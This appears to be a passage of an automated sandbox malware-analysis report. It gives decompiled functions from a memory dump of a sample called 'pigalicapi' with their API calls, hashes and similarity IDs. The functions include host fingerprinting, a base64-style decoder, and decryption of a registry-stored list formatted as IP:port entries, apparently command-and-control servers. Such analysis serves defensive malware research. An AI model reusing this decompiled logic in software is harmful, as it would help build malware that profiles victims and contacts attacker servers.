                                                                                                                                                                                                                                                                            							_v704 = _t76;
                                                                                                                                                                                                                                                                            							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                            								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                            								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                            								_v5 = 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                                                                            0x007b9d29
                                                                                                                                                                                                                                                                            0x007b9d31
                                                                                                                                                                                                                                                                            0x007b9d4b
                                                                                                                                                                                                                                                                            0x007b9d52
                                                                                                                                                                                                                                                                            0x007b9d59
                                                                                                                                                                                                                                                                            0x007b9d63
                                                                                                                                                                                                                                                                            0x007b9d6a
                                                                                                                                                                                                                                                                            0x007b9d74
                                                                                                                                                                                                                                                                            0x007b9d7b
                                                                                                                                                                                                                                                                            0x007b9d88
                                                                                                                                                                                                                                                                            0x007b9da2
                                                                                                                                                                                                                                                                            0x007b9da8
                                                                                                                                                                                                                                                                            0x007b9ddd
                                                                                                                                                                                                                                                                            0x007b9de5
                                                                                                                                                                                                                                                                            0x007b9deb
                                                                                                                                                                                                                                                                            0x007b9e03
                                                                                                                                                                                                                                                                            0x007b9e0b
                                                                                                                                                                                                                                                                            0x007b9e28
                                                                                                                                                                                                                                                                            0x007b9e32
                                                                                                                                                                                                                                                                            0x007b9e34
                                                                                                                                                                                                                                                                            0x007b9e4f
                                                                                                                                                                                                                                                                            0x007b9e73
                                                                                                                                                                                                                                                                            0x007b9e49
                                                                                                                                                                                                                                                                            0x007b9e49
                                                                                                                                                                                                                                                                            0x007b9e4f
                                                                                                                                                                                                                                                                            0x007b9e81
                                                                                                                                                                                                                                                                            0x007b9e87
                                                                                                                                                                                                                                                                            0x007b9ea2
                                                                                                                                                                                                                                                                            0x007b9ecf
                                                                                                                                                                                                                                                                            0x007b9ee4
                                                                                                                                                                                                                                                                            0x007b9e9c
                                                                                                                                                                                                                                                                            0x007b9e9c
                                                                                                                                                                                                                                                                            0x007b9eec
                                                                                                                                                                                                                                                                            0x007b9ef7
                                                                                                                                                                                                                                                                            0x007b9efd
                                                                                                                                                                                                                                                                            0x007b9f0a
                                                                                                                                                                                                                                                                            0x007b9f2b
                                                                                                                                                                                                                                                                            0x007b9f46
                                                                                                                                                                                                                                                                            0x007b9f4c
                                                                                                                                                                                                                                                                            0x007b9f4c
                                                                                                                                                                                                                                                                            0x007b9f57
                                                                                                                                                                                                                                                                            0x007b9f57
                                                                                                                                                                                                                                                                            0x007b9de5
                                                                                                                                                                                                                                                                            0x007b9da2
                                                                                                                                                                                                                                                                            0x007b9f63

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 007B9D9A
                                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 007B9DDD
                                                                                                                                                                                                                                                                              • Part of subcall function 007B9F70: GetAdaptersInfo.IPHLPAPI(00000000,007B9E2D), ref: 007B9FEB
                                                                                                                                                                                                                                                                            • StringFromCLSID.OLE32(00000020,?), ref: 007B9EF7
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 007B9F25
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 007B9F46
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 007B9F57
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: f90359303c00a0e86e57c29604f678433404e00997ca68413433f066b9cd4938
                                                                                                                                                                                                                                                                            • Instruction ID: 8a58a9e2f0fccd6383f95dab93bc3ced6d17ec5b6854ad377be79f0649c5ed69
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f90359303c00a0e86e57c29604f678433404e00997ca68413433f066b9cd4938
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8511971901318EFDB25CF54CC88BEAB7B9BB45304F1482D9E619AA280DB759B84CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B1390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				signed char* _v8;
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                                                            				signed int _t57;
                                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t52 = __eax;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = 0;
                                                                                                                                                                                                                                                                            					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                            					_v28 = _t57;
                                                                                                                                                                                                                                                                            					if(_v28 != 0) {
                                                                                                                                                                                                                                                                            						E007B7B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                            						E007B7B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                            						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                            						_v8 = _v28;
                                                                                                                                                                                                                                                                            						_v20 = 3;
                                                                                                                                                                                                                                                                            						while(_v20 == 3) {
                                                                                                                                                                                                                                                                            							_v32 = 0;
                                                                                                                                                                                                                                                                            							while(_v32 < 4) {
                                                                                                                                                                                                                                                                            								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                            									_t76 = E007B1500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                            									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                            									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                            								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                            								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t64 = E007B1580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                            							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                            							_v20 = _t64;
                                                                                                                                                                                                                                                                            							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                            								E007B7B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                            								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                            								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                            								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                            								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                                            						return _v24;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                                            0x007b1390
                                                                                                                                                                                                                                                                            0x007b139a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b13b6
                                                                                                                                                                                                                                                                            0x007b13b6
                                                                                                                                                                                                                                                                            0x007b13cd
                                                                                                                                                                                                                                                                            0x007b13d3
                                                                                                                                                                                                                                                                            0x007b13da
                                                                                                                                                                                                                                                                            0x007b13f0
                                                                                                                                                                                                                                                                            0x007b1406
                                                                                                                                                                                                                                                                            0x007b140b
                                                                                                                                                                                                                                                                            0x007b1411
                                                                                                                                                                                                                                                                            0x007b1414
                                                                                                                                                                                                                                                                            0x007b141b
                                                                                                                                                                                                                                                                            0x007b1425
                                                                                                                                                                                                                                                                            0x007b1437
                                                                                                                                                                                                                                                                            0x007b143d
                                                                                                                                                                                                                                                                            0x007b144f
                                                                                                                                                                                                                                                                            0x007b1454
                                                                                                                                                                                                                                                                            0x007b1459
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1461
                                                                                                                                                                                                                                                                            0x007b1461
                                                                                                                                                                                                                                                                            0x007b146e
                                                                                                                                                                                                                                                                            0x007b1478
                                                                                                                                                                                                                                                                            0x007b1434
                                                                                                                                                                                                                                                                            0x007b1434
                                                                                                                                                                                                                                                                            0x007b1485
                                                                                                                                                                                                                                                                            0x007b148a
                                                                                                                                                                                                                                                                            0x007b148d
                                                                                                                                                                                                                                                                            0x007b1496
                                                                                                                                                                                                                                                                            0x007b14bc
                                                                                                                                                                                                                                                                            0x007b14c1
                                                                                                                                                                                                                                                                            0x007b14ca
                                                                                                                                                                                                                                                                            0x007b14d3
                                                                                                                                                                                                                                                                            0x007b14dc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b14dc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b14ab
                                                                                                                                                                                                                                                                            0x007b14f1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b14f7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b13dc

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 007B13C6
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 007B13CD
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B149E
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 007B14A5
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B14EA
                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 007B14F1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                            • String ID: ====
                                                                                                                                                                                                                                                                            • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                            • Opcode ID: d8aae63e07f720ca9a1e9881a575bbee8575bbb31ff63d7e0333cf66176dace6
                                                                                                                                                                                                                                                                            • Instruction ID: 20f70394d5a76fc29f1bcd2a9ba4614b41c1f0abad2fba7eb1aec9b76294b10e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8aae63e07f720ca9a1e9881a575bbee8575bbb31ff63d7e0333cf66176dace6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36418DB5D00249EFCF04DFA8D899BEE7BB4BF44305F908619E915A7290D3389A44CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                                                            			E007B7970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				void* _v40;
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_v16 = 0x8c;
                                                                                                                                                                                                                                                                            					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                            					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t50;
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_t72 =  *0x7be28c; // 0x7c3f88
                                                                                                                                                                                                                                                                            						_t83 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            						_t52 = E007BA400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                            						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                            						_v24 = _t52;
                                                                                                                                                                                                                                                                            						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                            							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                            							_t58 = E007B8A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x7c30e8, 0x254);
                                                                                                                                                                                                                                                                            							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                            							if(_t58 != 0) {
                                                                                                                                                                                                                                                                            								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                            								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                            								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                            								if(_v40 != 0) {
                                                                                                                                                                                                                                                                            									_v48 = 0;
                                                                                                                                                                                                                                                                            									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                            										_t64 = E007B7B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                            										_push(_v44);
                                                                                                                                                                                                                                                                            										L007BB1EC();
                                                                                                                                                                                                                                                                            										_v52 = _t64;
                                                                                                                                                                                                                                                                            										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                            										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                            										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									 *_a4 = _v40;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                                            0x007b7976
                                                                                                                                                                                                                                                                            0x007b7981
                                                                                                                                                                                                                                                                            0x007b7987
                                                                                                                                                                                                                                                                            0x007b798e
                                                                                                                                                                                                                                                                            0x007b79a3
                                                                                                                                                                                                                                                                            0x007b79a9
                                                                                                                                                                                                                                                                            0x007b79b0
                                                                                                                                                                                                                                                                            0x007b79bf
                                                                                                                                                                                                                                                                            0x007b79c6
                                                                                                                                                                                                                                                                            0x007b79cd
                                                                                                                                                                                                                                                                            0x007b79d2
                                                                                                                                                                                                                                                                            0x007b79d5
                                                                                                                                                                                                                                                                            0x007b79df
                                                                                                                                                                                                                                                                            0x007b79ed
                                                                                                                                                                                                                                                                            0x007b7a10
                                                                                                                                                                                                                                                                            0x007b7a15
                                                                                                                                                                                                                                                                            0x007b7a1a
                                                                                                                                                                                                                                                                            0x007b7a29
                                                                                                                                                                                                                                                                            0x007b7a38
                                                                                                                                                                                                                                                                            0x007b7a51
                                                                                                                                                                                                                                                                            0x007b7a58
                                                                                                                                                                                                                                                                            0x007b7a5a
                                                                                                                                                                                                                                                                            0x007b7a6c
                                                                                                                                                                                                                                                                            0x007b7a84
                                                                                                                                                                                                                                                                            0x007b7a8f
                                                                                                                                                                                                                                                                            0x007b7a90
                                                                                                                                                                                                                                                                            0x007b7a95
                                                                                                                                                                                                                                                                            0x007b7abc
                                                                                                                                                                                                                                                                            0x007b7ac2
                                                                                                                                                                                                                                                                            0x007b7acb
                                                                                                                                                                                                                                                                            0x007b7a69
                                                                                                                                                                                                                                                                            0x007b7a69
                                                                                                                                                                                                                                                                            0x007b7ad6
                                                                                                                                                                                                                                                                            0x007b7ad6
                                                                                                                                                                                                                                                                            0x007b7a58
                                                                                                                                                                                                                                                                            0x007b7a1a
                                                                                                                                                                                                                                                                            0x007b7ae3
                                                                                                                                                                                                                                                                            0x007b7ae3
                                                                                                                                                                                                                                                                            0x007b79b0
                                                                                                                                                                                                                                                                            0x007b7aef

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,000075BC,00003000,00000004), ref: 007B79A3
                                                                                                                                                                                                                                                                              • Part of subcall function 007BA400: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,000F003F,00000000), ref: 007BA45C
                                                                                                                                                                                                                                                                              • Part of subcall function 007BA400: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007BA480
                                                                                                                                                                                                                                                                              • Part of subcall function 007BA400: RegCloseKey.KERNELBASE(00000000), ref: 007BA494
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B7AE3
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B8AD3
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: GetLastError.KERNEL32 ref: 007B8ADD
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8B0C
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 007B8B37
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B8B5E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 007B8B7A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 007B8B87
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 007B8B91
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8B9D
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 007B7A4B
                                                                                                                                                                                                                                                                            • inet_ntoa.WS2_32(?), ref: 007B7A90
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 007B7ABC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s:%u$Lyoxokxeruqp
                                                                                                                                                                                                                                                                            • API String ID: 1891311255-1376685685
                                                                                                                                                                                                                                                                            • Opcode ID: 10c22a1f0ccd7c3e519aeb90f0f92066f7854e5dbe57a6e8667a0fa271f257db
                                                                                                                                                                                                                                                                            • Instruction ID: e5f152ee97300bd4bc868187866b3b5a898b2999850cf9119acabf631d02e898
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10c22a1f0ccd7c3e519aeb90f0f92066f7854e5dbe57a6e8667a0fa271f257db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F41F1B1E04208EBDB04DB98CD85FEEB7B5EB88705F14C159E605BB281D7799A40CB64
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                                                            			E007B4AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                                                                            					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                                                            							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                                                                            						_t31 = E007B8250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                            						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                            						_v16 = _t31;
                                                                                                                                                                                                                                                                            						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                            						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E007B62B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                            						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                            						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L8:
                                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x007b4ac9
                                                                                                                                                                                                                                                                            0x007b4ad0
                                                                                                                                                                                                                                                                            0x007b4ad8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4ade
                                                                                                                                                                                                                                                                            0x007b4ae5
                                                                                                                                                                                                                                                                            0x007b4b80
                                                                                                                                                                                                                                                                            0x007b4b85
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4b85
                                                                                                                                                                                                                                                                            0x007b4b08
                                                                                                                                                                                                                                                                            0x007b4b0e
                                                                                                                                                                                                                                                                            0x007b4b15
                                                                                                                                                                                                                                                                            0x007b4b32
                                                                                                                                                                                                                                                                            0x007b4b37
                                                                                                                                                                                                                                                                            0x007b4b3a
                                                                                                                                                                                                                                                                            0x007b4b44
                                                                                                                                                                                                                                                                            0x007b4b4e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4b58
                                                                                                                                                                                                                                                                            0x007b4b6b
                                                                                                                                                                                                                                                                            0x007b4b78
                                                                                                                                                                                                                                                                            0x007b4b90
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4b90
                                                                                                                                                                                                                                                                            0x007b4ade
                                                                                                                                                                                                                                                                            0x007b4b96
                                                                                                                                                                                                                                                                            0x007b4b9b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 007B4AD8
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 007B4AF4
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(-0000000C), ref: 007B4B08
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(-0000000C), ref: 007B4B44
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B4B6B
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 007B4B78
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 007B4B85
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 007B4B90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                            • Opcode ID: d9049a70cf4f748f09f085542856f5d308513b53d61ff61364e3444db2519454
                                                                                                                                                                                                                                                                            • Instruction ID: 335b5f1c88bb21d421a6171635043ba357a73aeec34d0d631e90ba7522a13f56
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9049a70cf4f748f09f085542856f5d308513b53d61ff61364e3444db2519454
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88213EB4900208EFDB04DB98DD59FEEB7B9FB48301F10C648E605A7242D739DA40CBA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                                                            			E007B77B0(void** _a4) {
                                                                                                                                                                                                                                                                            				void** _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
